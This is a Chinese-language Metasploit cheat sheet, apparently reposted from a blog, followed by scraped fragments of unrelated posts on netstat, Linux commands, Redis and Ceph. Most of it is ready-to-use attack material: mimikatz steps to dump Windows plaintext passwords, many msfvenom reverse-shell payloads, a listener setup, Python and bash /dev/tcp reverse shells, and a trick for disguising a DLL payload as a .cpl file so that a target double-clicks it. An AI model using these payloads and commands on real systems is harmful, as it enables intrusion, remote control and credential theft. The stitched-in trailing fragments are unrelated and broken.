msf常用命令

p.p1 { margin: 0.0px 0.0px 2.0px 0.0px; font: 14.0px "Helvetica Neue"; color: #454545 }
p.p2 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px "Helvetica Neue"; color: #e4af0a }
p.p3 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px "Helvetica Neue"; color: #454545 }
p.p4 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px "Helvetica Neue"; color: #454545; min-height: 14.0px }
p.p5 { margin: 0.0px 0.0px 0.0px 0.0px; font: 12.0px ".PingFang SC"; color: #454545 }
p.p6 { margin: 0.0px 0.0px 2.0px 0.0px; font: 14.0px ".PingFang SC"; color: #454545 }
span.s1 { font: 14.0px ".PingFang SC" }
span.s2 { color: #454545 }
span.s3 { color: #e4af0a }
span.s4 { font: 12.0px ".PingFang SC" }
span.s5 { font: 12.0px "Helvetica Neue" }

获取 Windows 明文用户名密码

git clone https://github.com/gentilkiwi/mimikatz.git

load mimikatz

privilege::debug

sekurlsa::logonPasswords full

Python shell

python -c "import pty;pty.spawn(‘/bin/bash‘)"

MSF Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe

msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c

MSF 生成在 Linux 下反弹的 Meterpreter Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell

MSF 生成反弹 Shell (C Shellcode)

msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c

MSF 生成反弹 Python Shell

msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py

MSF 生成反弹 ASP Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp

MSF 生成反弹 Bash Shell

msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh

MSF 生成反弹 PHP Shell

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php

MSF 生成反弹 Win Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe

msf监听反弹

msf > use multi/handler

msf exploit(handler) > set PAYLOAD php/reverse_php

msf exploit(handler) > set LHOST 你的IP

msf exploit(handler) > set LPORT 反弹连接的端口

msf exploit(handler) > exploit

访问shell.php就会得到一个shell会话

PYTHON 反弹 Shell

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“你的ip”,443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);‘

nc反弹shell

肉鸡:

# bash -i >& /dev/tcp/反弹的ip/9999 0>&1

黑客机先监听:

# nc -vv -l -p 9999

得到shell会话

[[email protected] ~]#

msfvenom命令行选项如下:

Options:

-p, --payload    payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用‘-‘或者stdin指定

-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled    length>        为payload预先指定一个NOP滑动长度

-f, --format     format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder    [encoder]       指定需要使用的encoder(编码器)

-a, --arch       architecture>  指定payload的目标架构

--platform   platform>      指定payload的目标平台

-s, --space      length>        设定有效攻击荷载的最大长度

-b, --bad-chars  list>          设定规避字符集,比如: ‘\x00\xff‘

-i, --iterations count>         指定payload的编码次数

-c, --add-code   path>          指定一个附加的win32 shellcode文件

-x, --template   path>          指定一个自定义的可执行文件作为模板

-k, --keep                       保护模板程序的动作,注入的payload作为一个新的进程运行

--payload-options            列举payload的标准选项

-o, --out   path>               保存payload

-v, --var-name name>            指定一个自定义的变量,以确定输出格式

--shellest                   最小化生成payload

-h, --help                       查看帮助选项

--help-formats               查看msf支持的输出格式列表

CPL

其实cpl文件就是dll文件

只需要用msf生成一个dll的payload将名字改成xx.cpl 如果目标双击的话 即可成功getshell

payload

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.9 lport=4444 -f dll -o /tmp/test.cpl

可执行文件后缀

Windows支持的可直接执行文件后缀有

exe pif com cmd scr (jar等需要安装三方软件包不在考虑中)

迁移会话到系统进程(如果迁移失败会失去会话,需要重新建立会话。迁移成功后,即使exit主动退出该会话,再次exploit还会自动获得反弹shell。但如果目标系统重启,还是会丢失会话):

原文地址:https://www.cnblogs.com/i-honey/p/8824853.html

时间: 2024-11-09 00:40:06

msf常用命令的相关文章

metasploit 常用命令备忘

metasploit 常用命令备忘    MSFconsole Commands-------------------------------------24show exploits 查看所有exploitshow payloads 查看所有payloadshow auxiliary 查看所有auxiliarysearch name 搜索exploit 等info 查看加载模块的信息use name 加载模块LHOST 本机IPRHOST 目标IPset function 设置选项值setg

linux常用命令--netstat

简介 Netstat 命令用于显示各种网络相关信息,如网络连接,路由表,接口状态 (Interface Statistics),masquerade 连接等等. 常用参数 -a (all)显示所有选项,提示:LISTEN和LISTENING的状态只有用-a或者-l才能看到-t (tcp)仅显示tcp相关选项-u (udp)仅显示udp相关选项-n 拒绝显示别名,能显示数字的全部转化成数字.-l 仅列出有在 Listen (监听) 的服務状态 -p 显示建立相关链接的程序名-r 显示路由信息,路由

Linux常用命令(echo、date、ls、cd、history、cat)

一.linux常用命令有很多今天我们来总结一下常用的入门命令: 1.linux下关机命令:poweroff.init 0.halt.shutdown -h now 2.linux下重启命令:reboot.init 6.shutdown -r now 3.shutdown命令: 格式:shutdown  options TIME 其中options有以下几个: -r:执行重启 -c:取消shutdown命令 -h:执行关机 其中TIME有以下几个: now:表示现在 +m:相对时间表示法,从命令提

用xshell操作linux系统的常用命令

(1)命令ls——列出文件 ls -la 给出当前目录下所有文件的一个长列表,包括以句点开头的“隐藏”文件 ls a* 列出当前目录下以字母a开头的所有文件 ls -l *.doc 给出当前目录下以.doc结尾的所有文件 (2)命令cp——复制文件 cp afile afile.bak 把文件复制为新文件afile.bak cp afile /home/bible/ 把文件afile从当前目录复制到/home/bible/目录下 cp * /tmp 把当前目录下的所有未隐藏文件复制到/tmp/目

分布式缓存技术redis学习系列(二)——详细讲解redis数据结构(内存模型)以及常用命令

Redis数据类型 与Memcached仅支持简单的key-value结构的数据记录不同,Redis支持的数据类型要丰富得多,常用的数据类型主要有五种:String.List.Hash.Set和Sorted Set. Redis数据类型内存结构分析 Redis内部使用一个redisObject对象来表示所有的key和value.redisObject主要的信息包括数据类型(type).编码方式(encoding).数据指针(ptr).虚拟内存(vm)等.type代表一个value对象具体是何种数

ceph集群常用命令

结合网络.官网.手动查询等多方渠道,整理ceph维护管理常用命令,并且梳理常规命令在使用过程中的逻辑顺序.另外整理期间发现ceph 集群的命令体系有点乱,详细情况各自体验. 一:ceph集群启动.重启.停止 1:ceph 命令的选项如下: 选项简写描述 --verbose-v详细的日志. --valgrindN/A(只适合开发者和质检人员)用 Valgrind 调试. --allhosts-a在 ceph.conf 里配置的所有主机上执行,否 则它只在本机执行. --restartN/A核心转储

Linux系统的常用命令

常用命令 1.日期时间 date:查看.设置当前系统时间 hwclock显示硬件时钟时间 cal查看日历 uptime查看系统运行时间 2.输出.查看命令 echo:用以显示输入的内容 cat:用以显示文件夹内容 head:用以显示文件的头几行(默认10行) 参数:-n指定显示的行数 命令tail:用以显示文件的末尾几行(默认10行) 数:-n指定显示的行数 -f追踪显示文件更新(一般用于查看日志,命令不会退出,而是持续显示新加入的内容) 命令more:用于翻页显示文件内容(只能向下翻页) 命令

Linux常用命令学习

补充: 管道符号:   | 含义: 命令1 的正确输出作为命令2的输出对象. 格式: 命令1   |  命令2 举例: ls -ctrl |  more 常用命令: netstat   -an    |  grep    ESTABLISHED         查看正在连接的端口 netstat   -an    |   grep   LISTEN find   .    -name   test.txt    |     cat    -n          在当前目录下找到文件名为test.

Linux基础之常用命令

常用命令: Linux文件系统: 1.文件名名称严格区分字符大小写: 2.文件可以使用除/以外任意字符: 3.文件名长度不能超过255字符: 4.以.开头的文件为隐藏文件: .: 当前目录: ..: 当前目录的上一级目录: /etc/sysconfig/ .: sysconfig ..: /etc 工作目录:working directory 家目录:home 常用命令: pwd: printing working directory 显示工作目录 cd:change directory cd